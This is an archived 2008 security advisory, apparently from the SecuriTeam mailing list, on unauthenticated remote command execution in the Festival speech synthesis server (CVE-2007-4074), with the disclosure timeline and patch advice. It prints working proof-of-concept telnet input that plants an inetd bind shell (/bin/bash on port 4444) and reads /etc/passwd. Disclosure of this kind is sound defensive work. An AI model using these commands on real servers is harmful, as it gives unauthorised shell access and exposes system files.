Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Festival Command Execution Vulnerability

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Festival Command Execution Vulnerability
Date: 8 Apr 2008 14:07:02 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Festival Command Execution Vulnerability
------------------------------------------------------------------------


SUMMARY

 <http://www.cstr.ed.ac.uk/projects/festival/> Festival offers "a general 
framework for building speech synthesis systems as well as including 
examples of various modules". The Festival server is vulnerable to 
unauthenticated remote code execution.

Further research indicates that this vulnerability has already been 
reported as a local privilege escalation against both the Gentoo and SuSE 
GNU/Linux distributions and was assigned CVE-2007-4074.

The remote form of this vulnerability was identified in 1.96~beta-5 as 
distributed in Debian unstable but it is also believed that Ubuntu Hardy 
Heron was affected.

DETAILS

Vulnerable Systems:
 * Festival version 1.96:beta July 2004

The Festival server which can be started using festival --server is 
vulnerable to unauthenticated remote command execution due to the 
inclusion of a scheme interpreter.  It is possible to make use of standard 
scheme functions in order to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be 
exploited the inclusion of a scheme interpreter available without 
authentication allows for other vectors of attack.  Scheme functions such 
as SayText and tts (which reads a file on the vulnerable system) pose 
particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in 
this manner is entirely intentional, the default behaviour of the server 
could be exploited particularly where the user is unaware of the servers 
existance.  In the case of both Debian unstable and Ubuntu Hardy Heron, 
this meant that the server was likely to be started by the init subsystem 
albeit as a non-privileged user.

Solutions:
In order to completely protect against the vulnerability (in the short 
term), Nth Dimension recommend turning off the server or filtering 
connections to the affected port using a host based firewall.  The server 
itself can be secured by applying the patches located at  
<http://bugs.gentoo.org/show_bug.cgi?id=170477> 
http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a 
default configuration which limits access to localhost and setting an 
optional password which prevents unauthenticated access.

Following vendor notification on the 16th Febuary 2007 (Debian) and 2nd 
March 2007 (Ubuntu), both issued patched versions in their respective 
distributions which document the possible security issue and how it can be 
resolved and change the default behaviour of the package to prevent the 
server being started by the init subsystem.  Details of the Debian changes 
can be found firstly in bug #466146 and then #466796.  Nth Dimension would 
recommend that the patches for these bugs are applied.  Nth Dimension 
would like to thank the Debian package maintainer Kumar Appaiahi as well 
as Nico Golde of Debian testing security and Jamie Strandboge of Canonical 
for the way they worked to resolve the issue.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074> 
CVE-2007-4074


ADDITIONAL INFORMATION

The information has been provided by  <mailto:timb@nth-dimension.org.uk> 
Tim Brown.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Festival Command Execution Vulnerability, SecuriTeam <=
Previous by Date:  [NEWS] Websphere MQ MCAUSER Setting Bypass Vulnerability, SecuriTeam
Next by Date:  [NT] Symantec Norton Internet Security 2008 ActiveX Control Buffer Overflow Vulnerability, SecuriTeam
Previous by Thread:  [NEWS] Websphere MQ MCAUSER Setting Bypass Vulnerability, SecuriTeam
Next by Thread:  [NT] Symantec Norton Internet Security 2008 ActiveX Control Buffer Overflow Vulnerability, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]